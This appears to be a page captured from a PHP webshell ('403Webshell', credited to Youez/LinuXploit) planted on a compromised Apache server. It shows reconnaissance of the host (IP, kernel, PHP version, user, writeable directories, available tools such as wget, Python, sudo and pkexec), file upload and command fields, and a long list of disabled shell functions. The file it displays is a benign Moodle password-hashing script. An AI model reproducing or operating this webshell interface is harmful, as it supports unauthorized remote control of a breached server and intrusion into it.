403Webshell
Server IP : 103.119.228.120  /  Your IP : 18.224.73.157
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /var/softaculous/moodle/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /var/softaculous/moodle/update_pass.php
<?php
function __password_hash($password, $algo, array $options = array()) {

global $error;
	if (!function_exists('crypt')) {
		$error[] = "Crypt must be loaded for password_hash to function";
		return null;
	}
	if (!is_string($password)) {
		$error[] = "password_hash(): Password must be a string";
		return null;
	}
	if (!is_int($algo)) {
		$error[] = "password_hash() expects parameter 2 to be long, " . gettype($algo) . " given";
		return null;
	}
	switch ($algo) {
		case 1:
			// Note that this is a C constant, but not exposed to PHP, so we don't define it here.
			$cost = 10;
			if (isset($options['cost'])) {
				$cost = $options['cost'];
				if ($cost < 4 || $cost > 31) {
					$error[] = "password_hash(): Invalid bcrypt cost parameter specified: ".$cost;
					return null;
				}
			}
			$required_salt_len = 22;
			$hash_format = sprintf("$2y$%02d$", $cost);
			break;
		default:
			$error[] = "password_hash(): Unknown password hashing algorithm: ".$algo;
			return null;
	}
	if (isset($options['salt'])) {
		switch (gettype($options['salt'])) {
			case 'NULL':
			case 'boolean':
			case 'integer':
			case 'double':
			case 'string':
				$salt = (string) $options['salt'];
				break;
			case 'object':
				if (method_exists($options['salt'], '__tostring')) {
					$salt = (string) $options['salt'];
					break;
				}
			case 'array':
			case 'resource':
			default:
				$error[] = 'password_hash(): Non-string salt parameter supplied';
				return null;
		}
		if (strlen($salt) < $required_salt_len) {
			$error[] = "password_hash(): Provided salt is too short: ".strlen($salt)." expecting ".$required_salt_len;
			return null;
		} elseif (0 == preg_match('#^[a-zA-Z0-9./]+$#D', $salt)) {
			$salt = str_replace('+', '.', base64_encode($salt));
		}
	} else {
		$buffer = '';
		$raw_length = (int) ($required_salt_len * 3 / 4 + 1);
		$buffer_valid = false;
		if (function_exists('mcrypt_create_iv')) {
			$buffer = mcrypt_create_iv($raw_length, MCRYPT_DEV_URANDOM);
			if ($buffer) {
				$buffer_valid = true;
			}
		}
		if (!$buffer_valid && function_exists('openssl_random_pseudo_bytes')) {
			$buffer = openssl_random_pseudo_bytes($raw_length);
			if ($buffer) {
				$buffer_valid = true;
			}
		}
		if (!$buffer_valid && file_exists('/dev/urandom')) {
			$f = @fopen('/dev/urandom', 'r');
			if ($f) {
				$read = strlen($buffer);
				while ($read < $raw_length) {
					$buffer .= fread($f, $raw_length - $read);
					$read = strlen($buffer);
				}
				fclose($f);
				if ($read >= $raw_length) {
					$buffer_valid = true;
				}
			}
		}
		if (!$buffer_valid || strlen($buffer) < $raw_length) {
			$bl = strlen($buffer);
			for ($i = 0; $i < $raw_length; $i++) {
				if ($i < $bl) {
					$buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255));
				} else {
					$buffer .= chr(mt_rand(0, 255));
				}
			}
		}
		$salt = str_replace('+', '.', base64_encode($buffer));

	}
	$salt = substr($salt, 0, $required_salt_len);

	$hash = $hash_format . $salt;

	$ret = crypt($password, $hash);

	if (!is_string($ret) || strlen($ret) <= 13) {
		return false;
	}

	return $ret;
}

$resp = __password_hash('[[admin_pass]]', 1, array());
echo '<update_pass>'.$resp.'</update_pass>';
// We do not need this file any more
unlink('update_pass.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit